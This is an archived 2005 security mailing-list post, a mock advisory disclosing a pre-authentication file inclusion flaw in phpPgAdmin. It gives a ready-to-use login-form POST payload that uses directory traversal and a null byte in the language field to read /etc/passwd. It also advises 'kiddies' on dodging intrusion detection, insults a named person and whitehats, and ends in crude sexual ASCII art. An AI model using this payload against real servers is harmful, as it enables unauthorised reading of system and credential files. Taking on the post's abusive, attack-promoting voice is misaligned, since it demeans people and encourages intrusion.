Dailydave mailing list archives
!!! pre-authenticated remote code inclusion vulnerability inside phppgadmin !!!
From: <rznvynqqe () hushmail com>
Date: Mon, 4 Jul 2005 19:24:37 -0700
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 NOTE: this advisory complies with draft-christey-wysopal-vuln- disclosure-00.txt !!! pre-authenticated remote code inclusion vulnerability inside phppgadmin !!! What is this stuff? phpPgAdmin is a web-based administration tool for PostgreSQL. It is perfect for PostgreSQL DBAs, newbies and hosting services. phpPgAdmin is one of the best database front-ends available. you cant get this in stores man! remote pre-auth file inclusion vulnerability brought to you by bad method of data usage, found by twigglestick (also known as vengeful striking hammer of god), massive 0day finding ALF member. Remember, DON'T USE THIS VULNERABILITY TO BREAK PORN SITES, PORN IS GOOD. ALSO ALL YOU WHITEHATS ARE BAD, VERY VERY BAD. OK THNX. install phppgadmin (http://phppgadmin.sourceforge.net/) post to login form formUsername=username&formPassword=password&formServer=0&formLanguag e=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/et c/passwd%00&submitLogin=Login *Remeber kiddies, many of stupid IDS will go off when you do this, so change file! and saying 'FUCK PETE SHIPLEY' while doing it. remember programmer, don't include user input directly into the code, its too easy to make mistakes, think default deny policy for example, with explicit allows. this also is cross-site with server errors working, but we don't care about that. bye for now! || __ _ __ || <> __ ___ __ _ || <> __ || || / \| / _] ||// |//\\ /\|| | /\\ / \ |/ \ _|| / _] ||// ||/\ ||| | ||_ |<< || || || <__|| | ] |||| || /<>| || ||_ |<< || || \__/| \__] ||\\ || || || ___|| || \__/ || \__| || \__] ||\\ SSSSSSSSSSSSSSSSSSS SSSSSSSSSSSSSSSSSSSSSSSSS SSSSSSSSSSSSSSSSSSSSSSSSSSSSS SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS:SSSS SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS:::SSS SSSSSSSSSSSSSSSSSSSSSSSSSSSSSS::::::SS SSSSSSSSSSSSSSS:::::::::::::::::::::NS SSSSSSSSSSSSSS::nnnnnnn,::::::,nnnnnN SSSSSSSSSSSSS::':::::::::::::/:::::N SSSSSSSNNNNSS:::;oO@@Oo;::::::;oO@@n SSSSSSN::::SS::::::::::::::::::::::N SSSSSSN:::::::::::::::::::::::::::::N SSSSSSN::::::::::::::::::::::::::::N SSSSSSNN:::::::::::::::nNNn:::::::N SSSSSS:N::::::::::::::::::::::::N SSSSS:NN::::::::::::::::::::::N /----------- - ----------\ SSS::::NNN::::::::"NNNNNNN:::N -----/ 0day give me hard-on \ N:::::::NNN:::::::"NnnN:::N \ wanna touch it? / N::::::::::NNN:::::::::::N \---------------------/ NN::::::NN::::NNN:::::::N NN::::::::NNN::::NNNNNNNN N::::::::::::NN:::::::N NN::::::::::::::NN::::::N NNNN:::::::::::::::::N::::N NN::::::::::::::::::NNNNNN::N NN::::::::::::::::::::::::NNNNN N::::::::::::::::::::::::::::NNN N:::::::::::::::::::::::::::::::NN NN:::::::::::::::::::::::N:::::::::N N:::::::::::::::::::::::::N:::::::::N N:::::::::::::::::::::::::N::::::::::N N:::::::::::::::::::::::::N:::::::::::N NN::::::::::::::::::::::::N::::::::::::N N:::::::::::::::::::::::N::::::::::::::N N:::::::::::::::::::::N::::::::::::::::N NN::::::::::::::::::N:N::::::::::::::::N N:NN::::::::::::::NN::N::::::::::::::::N N:::N::::::::::::N:::::N:::::::::::::::N N:::::::::::::::NN::::::N::::::::::::::oo N::::::::::::::::::::::::N::::::::::::o@@ N::::::::::::::::::::::::N:::::::::::No' N::::::::::::::::::::::::N::::::::NNNN N::::::::::::::::::::::::N:::::::N:::N N::::::::::::::::::::::::N::::::::::NN N::::::::::::::::::::::::N:::::::::::N N::::::::::::::::::::::N:::::N::::::N NNNNNNNNNNNN N:::N::::::::::::::::::N::::N::::::N N::::::::::::NN N:::N::::::::::::::::N:::::N::::N NNNN:::::NNNNNNNNNN N:::N::::::::::::::NNN::::::N::::N N::::::::::::::NN N:::N::::::::::::::::NN::::::N:::NNNNNNNNNNNNNNNNNN:::::::::::()::NN N:::N:::::::::::::::::NNNNNNNNNNN::::::::::::::::::::::::::::::NNN N::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::()::NN N::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::NNN N::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::()::NN N::::::N::::::::NNNN::::::::::::::::::::::::NNNN::::::::::::::::NNN N:::::::N::::::::::::NNNNNNN::::::::::NNNNNNN:::::::::::::::::()::NN N::::::::N::::::::::::::::::NNNNNNNNNN:::::::::::::::::::::::::::NN N:::::::::NN:::::::::::::::::::::::::::::::NNNNNNNNNNNNNNNNNNNNNNN N:::::::::::NN::::::::::::::::::::::NNNNNNN NNNNN N::::::::::::::::::::::::::NNNNNNNN NN:::::0 NNN::::::::::::NNNNNNNNNNN:::::::N N><::::::N N:NNNNNNNNNNNN::::::::::::::::::N NN::><:::::N N:::::::::::::::::::::::::::::::N NN:::::><:::N N::::::::::::::::::::::::::::::::N NN::::::::><NN N::::::::::::::::::::::::::::::::N NN:::::::::NN N:::::::::::::::::::::::::::::::::N# NN:::::::::NN N::::::::::::::::::::::::::::::::::N##:::::::::NN N::::::::::::::::::::::::::::::::::N####:::::NN N:::::::::::N::::::::::::::::::::::N####:::NN N:::::::::::NN:::::::::::::::::::::N####:NN N:::::::::::NNN:::::::::::::::::::NN####N N:::::::::::NN:N::::::::::::::::::N###### N:::::::::::N:::::::::::::::::::::N!##### N:::::::::N::::::::::::::::::::::N!!###N N::::::::::::::::::::::::::::::::N!!###NN N::::::::::::::::::::::::::::::::N!!!!!NN NN:::::::::::::::::::::::::::::::N!!!!!N:N NN::::::::::::::::::::::::::::::N!!!!!!N:N NNN::::::::::::::::::::::::::::N!!!!!!N::N NN:::::::::::::::::::::::::::::N!!!!!N:::N N:::::::::::::::::::::::::::::N!!!!!!N:::N N:::::::::::::::::::::::::::::N!!!!!!:::::N N:::::::::::::::::::::::::::::N!!!!!N::::::N N:::::::::::::::::::::::::::::N!!!!!N:::::::N N:::::::::::::::::::::::::::::N!!!!N:::::::::N N:::::::::::::::::::::::::::::NNNNN:::::::::::N N::::::::::::::::::::::::::::N:::::::::::::::::N N::::::::::::::::::::::::::::N::::::::::::::::::N N::::::::::::::::::::::::::::N:::::::::::::::::::N N:::::::::::N::::::::::::::::N::::::::::::::::::::N N::::::::::N:::::::::::::::::NN::::::::::::::::::::N N::::::::::N:::::::::::::::::NNN::::::::::::::::::::N N::::::::::N:::::::::::::::::N:NN::::::::::::::::::::N N::::::::::N::::::::::::::::N::::NN:::::::::::::::::::N -----BEGIN PGP SIGNATURE----- Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 2.4 wkYEARECAAYFAkLJ4c0ACgkQZvG4N6tdg63x2gCfYBjgFnFRU6EyEVRQ4IFnm9iLfLoA nAi4IBh+YFO5EaG2iAaB8LFf6Oxx =hxv0 -----END PGP SIGNATURE----- Concerned about your privacy? Follow this link to get secure FREE email: http://www.hushmail.com/?l=2 Free, ultra-private instant messaging with Hush Messenger http://www.hushmail.com/services-messenger?l=434 Promote security and make money with the Hushmail Affiliate Program: http://www.hushmail.com/about-affiliate?l=427 _______________________________________________ Dailydave mailing list Dailydave () lists immunitysec com https://lists.immunitysec.com/mailman/listinfo/dailydave
Current thread:
- !!! pre-authenticated remote code inclusion vulnerability inside phppgadmin !!! rznvynqqe (Jul 04)